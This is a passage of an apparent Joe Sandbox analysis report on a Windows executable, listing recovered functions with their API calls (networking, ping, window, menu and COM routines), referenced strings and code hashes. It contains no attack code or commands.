gethostname.WSOCK32(?,00000100), ref: 00B846EC
gethostbyname.WSOCK32(?), ref: 00B846F9
_wcscpy.LIBCMT ref: 00B84721
_memmove.LIBCMT ref: 00B84734
inet_ntoa.WSOCK32(?), ref: 00B8473F
_strcat.LIBCMT ref: 00B8474D
_wcscpy.LIBCMT ref: 00B84764
WSACleanup.WSOCK32 ref: 00B84772
_wcscpy.LIBCMT ref: 00B84780

Strings

0.0.0.0, xrefs: 00B8471B

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 33b78f966a3f20f2db07e4bb888e2e200bbd2d3b93a987271b8bbab36c09ac50
Instruction ID: 7472e825e5b310394c1480007a847a271d0aa959a0b7aff2442c319f9a4f6656
Opcode Fuzzy Hash: 33b78f966a3f20f2db07e4bb888e2e200bbd2d3b93a987271b8bbab36c09ac50
Instruction Fuzzy Hash: BC11C039900116ABCB20BB709C4AEEA7BECEF02711F0401FAF545960A1EF748E81DB55

Function 00B84F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00B84F7A

Part of subcall function 00B4049F: timeGetTime.WINMM(?,76C1B400,00B30E7B), ref: 00B404A3

Sleep.KERNEL32(0000000A), ref: 00B84FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00B84FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B84FEC
SetActiveWindow.USER32 ref: 00B8500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B85019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00B85038
Sleep.KERNEL32(000000FA), ref: 00B85043
IsWindow.USER32 ref: 00B8504F
EndDialog.USER32(00000000), ref: 00B85060

Strings

BUTTON, xrefs: 00B84FDE

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: f30beacabd13d4502c81b4e3e56c99022dcf460b7c8164f97f3c8e4659e5dba6
Instruction ID: a2dfd20922ae32e83225002eff8db564f6d3b7afa1d0af030ad87a54e623b807
Opcode Fuzzy Hash: f30beacabd13d4502c81b4e3e56c99022dcf460b7c8164f97f3c8e4659e5dba6
Instruction Fuzzy Hash: 6C21C670604A4AAFE7207F70ECCAA763BE9EB25785F041068F206871B1DF714D00DB61

Function 00B8D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B29837: __itow.LIBCMT ref: 00B29862
Part of subcall function 00B29837: __swprintf.LIBCMT ref: 00B298AC

CoInitialize.OLE32(00000000), ref: 00B8D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B8D67D
SHGetDesktopFolder.SHELL32(?), ref: 00B8D691
CoCreateInstance.OLE32(00BB2D7C,00000000,00000001,00BD8C1C,?), ref: 00B8D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B8D74C
CoTaskMemFree.OLE32(?,?), ref: 00B8D7A4
_memset.LIBCMT ref: 00B8D7E1
SHBrowseForFolderW.SHELL32(?), ref: 00B8D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B8D840
CoTaskMemFree.OLE32(00000000), ref: 00B8D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B8D87E
CoUninitialize.OLE32(00000001,00000000), ref: 00B8D880

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: c522355db21aba55744dab3ded61508b3d8c1e214f8cf0748958d4c03f401580
Instruction ID: bbdf08a428adada3933d324aea2b37ce2c912c27e4afd62b112af4502ac5cff0
Opcode Fuzzy Hash: c522355db21aba55744dab3ded61508b3d8c1e214f8cf0748958d4c03f401580
Instruction Fuzzy Hash: 67B1EC75A00119AFDB04EFA4D889DAEBBF9FF49314F1484A9E909DB261DB30ED41CB50

Function 00B7C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00B7C283
GetWindowRect.USER32(00000000,?), ref: 00B7C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B7C2F3
GetDlgItem.USER32(?,00000002), ref: 00B7C2FE
GetWindowRect.USER32(00000000,?), ref: 00B7C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B7C364
GetDlgItem.USER32(?,000003E9), ref: 00B7C372
GetWindowRect.USER32(00000000,?), ref: 00B7C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B7C3C6
GetDlgItem.USER32(?,000003EA), ref: 00B7C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B7C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00B7C3FE

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: f775fe2b9311053c06d06c1e67b3d12172d0fea4f0a46caae8f3a69e43cadc8e
Instruction ID: b2a66cf6824903060fd7bd025880ee96013a72d9fabd372c15a555c04a3cc704
Opcode Fuzzy Hash: f775fe2b9311053c06d06c1e67b3d12172d0fea4f0a46caae8f3a69e43cadc8e
Instruction Fuzzy Hash: E6514271B00205AFDB18CFA9DD86ABDBBB6EB88310F14816DF519D7290DB709D00CB14

Function 00B2201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00B21B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B22036,?,00000000,?,?,?,?,00B216CB,00000000,?), ref: 00B21B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B220D3
KillTimer.USER32(-00000001,?,?,?,?,00B216CB,00000000,?,?,00B21AE2,?,?), ref: 00B2216E
DestroyAcceleratorTable.USER32(00000000), ref: 00B5BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B216CB,00000000,?,?,00B21AE2,?,?), ref: 00B5BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B216CB,00000000,?,?,00B21AE2,?,?), ref: 00B5BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B216CB,00000000,?,?,00B21AE2,?,?), ref: 00B5BD0A
DeleteObject.GDI32(00000000), ref: 00B5BD1C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: facffcf3a8b91817082d269b79aa32d24617bf3c3e141b8f414f45371ae76f21
Instruction ID: 40b15aa02698797835c8784c9a1c957aa73d2d6183f496182a3bb890acc99d9d
Opcode Fuzzy Hash: facffcf3a8b91817082d269b79aa32d24617bf3c3e141b8f414f45371ae76f21
Instruction Fuzzy Hash: 8461BE31500A61EFDB359F14E989B2AB7F2FF41316F1045A9E9869B970CB70AC90DF90

Function 00B221A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00B225DB: GetWindowLongW.USER32(?,000000EB), ref: 00B225EC

GetSysColor.USER32(0000000F), ref: 00B221D3

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 22e7928642ab8462e0627567de4b826831f4dae4bf068d12e993523b218e9672
Instruction ID: 5ace2af0de38e39b2c07df3c3a54564072fcff7085bed5e8db197316d74c4689
Opcode Fuzzy Hash: 22e7928642ab8462e0627567de4b826831f4dae4bf068d12e993523b218e9672
Instruction Fuzzy Hash: 5C416F31500550EADB255F68EC89BB93BA5EB06321F1843E5FE69DB1E5CB328C42DB21

Function 00B8A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00BAF910), ref: 00B8A90B
GetDriveTypeW.KERNEL32(00000061,00BD89A0,00000061), ref: 00B8A9D5
_wcscpy.LIBCMT ref: 00B8A9FF

Strings

cdrom, xrefs: 00B8A927
ramdisk, xrefs: 00B8A97F
unknown, xrefs: 00B8A996
all, xrefs: 00B8A911
network, xrefs: 00B8A969
fixed, xrefs: 00B8A953
removable, xrefs: 00B8A93D

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 379651ea646bd5ebaa630679b1d7f77d41ff314202cd8650d5e9d97eac446ef6
Instruction ID: 23c011901660ce68d7ceba79a452dbe9f22927f86e0845ea56f785e66589e2bf
Opcode Fuzzy Hash: 379651ea646bd5ebaa630679b1d7f77d41ff314202cd8650d5e9d97eac446ef6
Instruction Fuzzy Hash: 6D51AB31118301ABD314FF14D892AAFB7E5EF95340F1448AEF599572A2DB31DA09CB93

Function 00B29837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00B29862
__swprintf.LIBCMT ref: 00B298AC
__i64tow.LIBCMT ref: 00B5F5E6

Strings

%.15g, xrefs: 00B298A6
True, xrefs: 00B5F5A7
False, xrefs: 00B5F5AE
0x%p, xrefs: 00B5F5C8

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 9d3d542dd4aff9c9c157779d9c26b100d42791c10fa2ef07b81f571700c817b4
Instruction ID: ee5924660a6e92433a36185c8e001dcf38cb3f2cd3df6618e85b5c44e1abd0d5
Opcode Fuzzy Hash: 9d3d542dd4aff9c9c157779d9c26b100d42791c10fa2ef07b81f571700c817b4
Instruction Fuzzy Hash: E541D771914206AFEB24DF34E841A76B3E8FF05340F2444FEE94DDB291FA319A459B10

Function 00BA7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BA716A
CreateMenu.USER32 ref: 00BA7185
SetMenu.USER32(?,00000000), ref: 00BA7194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BA7221
IsMenu.USER32(?), ref: 00BA7237
CreatePopupMenu.USER32 ref: 00BA7241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BA726E
DrawMenuBar.USER32 ref: 00BA7276

Strings

0, xrefs: 00BA7160
F, xrefs: 00BA7262

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: bc45b35316c6772b32807fa2b6d3dedf08a3663c8e894ae99372399fbbd2a428
Instruction ID: 450aa6be26ef7e6e4fe36d1fbd367cb832a609511e9993c53cc43ec853b88d6f
Opcode Fuzzy Hash: bc45b35316c6772b32807fa2b6d3dedf08a3663c8e894ae99372399fbbd2a428
Instruction Fuzzy Hash: B3415874A09209EFDB20DFA4D884FAA7BF5FF4A310F1400A8F945A7360DB31A910CB90

Function 00BA74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BA755E
CreateCompatibleDC.GDI32(00000000), ref: 00BA7565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BA7578
SelectObject.GDI32(00000000,00000000), ref: 00BA7580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00BA758B
DeleteDC.GDI32(00000000), ref: 00BA7594
GetWindowLongW.USER32(?,000000EC), ref: 00BA759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00BA75B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00BA75BE

Strings

static, xrefs: 00BA74F6

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 7a583baa90daf36a992e7eae2b3950ac844fd91212a84f5416f913a85dfd367d
Instruction ID: 63e760b24a9e2cd2995727d2a1df29511dd9f38a6b476e12292d3ee373c89286
Opcode Fuzzy Hash: 7a583baa90daf36a992e7eae2b3950ac844fd91212a84f5416f913a85dfd367d
Instruction Fuzzy Hash: C531B132508215BBDF219FA4DC09FEB3BA9FF1A320F110264FA55A60A0CB31D811DBA4

Function 00B46E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B46E3E

Part of subcall function 00B48B28: __getptd_noexit.LIBCMT ref: 00B48B28

__gmtime64_s.LIBCMT ref: 00B46ED7
__gmtime64_s.LIBCMT ref: 00B46F0D
__gmtime64_s.LIBCMT ref: 00B46F2A
__allrem.LIBCMT ref: 00B46F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B46F9C
__allrem.LIBCMT ref: 00B46FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B46FD1
__allrem.LIBCMT ref: 00B46FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B47006
__invoke_watson.LIBCMT ref: 00B47077

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 4fb6c16c75b5814444d476205fb5cd31753f44f2dfcc891d17f9a2966fb9b65a
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: BC712572A40716ABD714AE68DC81B6AB3E8EF05764F1082A9F814D7381EB70DF449B91

Function 00B82527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B82542
GetMenuItemInfoW.USER32(00BE5890,000000FF,00000000,00000030), ref: 00B825A3
SetMenuItemInfoW.USER32(00BE5890,00000004,00000000,00000030), ref: 00B825D9
Sleep.KERNEL32(000001F4), ref: 00B825EB
GetMenuItemCount.USER32(?), ref: 00B8262F
GetMenuItemID.USER32(?,00000000), ref: 00B8264B
GetMenuItemID.USER32(?,-00000001), ref: 00B82675
GetMenuItemID.USER32(?,?), ref: 00B826BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B82700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B82714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B82735

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: b5f5b88f63806d19f9fd8e7f6868363d0c1df0457c185920c63b162cb405ad44
Instruction ID: 71f65c046e58698896420fa08852448a6400302f08e5fbea2e6e9525f342b961
Opcode Fuzzy Hash: b5f5b88f63806d19f9fd8e7f6868363d0c1df0457c185920c63b162cb405ad44
Instruction Fuzzy Hash: 1861907490024AAFDF21EFA4DD89DFE7BF8EB45304F140199E942A7261EB31AD05DB21

Function 00BA6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BA6FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BA6FA8
GetWindowLongW.USER32(?,000000F0), ref: 00BA6FCC
_memset.LIBCMT ref: 00BA6FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BA6FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BA7067

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 23cc852b53687911ca954029ec15e66b3684aabb1b81715a8894a1428cee0f32
Instruction ID: 6e6a13ccf7094a94880f7e23384b8fa5e08bdfc6f48e4a62e018c541f241af12
Opcode Fuzzy Hash: 23cc852b53687911ca954029ec15e66b3684aabb1b81715a8894a1428cee0f32
Instruction Fuzzy Hash: 18617D75904248AFDB20DFA4CC81EEE77F8EB09714F140199FA14AB2A1CB71AD41DB90

Function 00B76B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B76BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00B76C18
VariantInit.OLEAUT32(?), ref: 00B76C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00B76C4A
VariantCopy.OLEAUT32(?,?), ref: 00B76C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00B76CB1
VariantClear.OLEAUT32(?), ref: 00B76CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00B76CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B76CDC
VariantClear.OLEAUT32(?), ref: 00B76CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B76CF9

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: d7d933c425da90bff0ec7feb35f94c02d2e123e7e9eacdeed191e3d97e3573ed
Instruction ID: 8df791fc71135b15a791e220b2824c71521854f1c45f4235a2b86fd06d5da51e
Opcode Fuzzy Hash: d7d933c425da90bff0ec7feb35f94c02d2e123e7e9eacdeed191e3d97e3573ed
Instruction Fuzzy Hash: 18414F31A0021A9FCF00DFA8D8459EEBBF9EF09350F00C0A9E959E7361DB30A945CB90

Function 00B95732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B95793
inet_addr.WSOCK32(?,?,?), ref: 00B957D8
gethostbyname.WSOCK32(?), ref: 00B957E4
IcmpCreateFile.IPHLPAPI ref: 00B957F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B95862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B95878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B958ED
WSACleanup.WSOCK32 ref: 00B958F3

Strings

Ping, xrefs: 00B95816

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
